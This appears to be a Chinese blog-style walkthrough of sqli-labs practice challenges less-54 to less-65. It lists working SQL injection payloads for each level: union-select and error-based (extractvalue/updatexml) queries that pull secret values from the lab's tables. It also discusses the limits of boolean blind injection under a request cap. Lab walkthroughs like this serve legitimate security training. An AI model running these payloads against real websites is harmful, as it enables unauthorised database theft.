目录
less-62-GET-单引号括号闭合-无报错-bool盲注
less-65-GET--双引号括号闭合-无报错-bool盲注
less-54-GET-单引号闭合-内联注入
字段数为3,union select 直接完成。
less-55--GET-括号闭合-内联注入-无报错
id=-1) union select 1,(select group_concat(secret_GU33) from x0o8jauhf7),3--+
less-56-GET-单引号括号闭合-内联注入-无报错
和less55一样只是闭合方式不同。
id=-1') union select 1,(select group_concat(secret_GU33) from x0o8jauhf7),3--+
less-57-双引号闭合-内联注入-无报错
和less56一样只是闭合方式不同。
id=-1" union select 1,(select group_concat(secret_QIPL) from zsgtcrhegi),3--+
less-58-GET-单引号闭合-报错注入
id=-1' and extractvalue (1,concat(0x7e,((select group_concat(secret_WYC1) from vyxmh0nt3f)),0x7e))--+
less-59-GET-整形闭合-报错注入
id=1 and updatexml(1,concat(0x7e, ((select group_concat(secret_T9NI )from 8clzoo18ug)),0x7e),1)--+
less-60-GET-双引号括号闭合,报错注入
id=1") and updatexml(1,concat(0x7e, ((select group_concat(secret_C0KN) from 9vhhw9avx8)),0x7e),1)--+
less-61-GET-单引号括号括号闭合-报错注入
id=1')) and updatexml(1,concat(0x7e, ((select group_concat(secret_4M1X) from za1d6wdjxu)),0x7e),1)--+
less-62-GET-单引号括号闭合-无报错-bool盲注
看到这个130次,就知道是盲注了。直接上脚本嘿嘿>-<。
爆数据库名:
完了啊脚本请求太快了表名爆不出来了。难道要手工盲注?
看了一下表名是10位,列名不同的是4位,秘密值24位,给定的限制是130次,就是说一位最多只能猜3次才可以跑出来,注鸡毛啊。根本就是不可能的。
less-63-GET-单引号闭合-无报错-bool盲注
less-64-GET-括号括号闭合-无报错-bool盲注
less-65-GET--双引号括号闭合-无报错-bool盲注
总结
没意思,基本上就是判断闭合方式。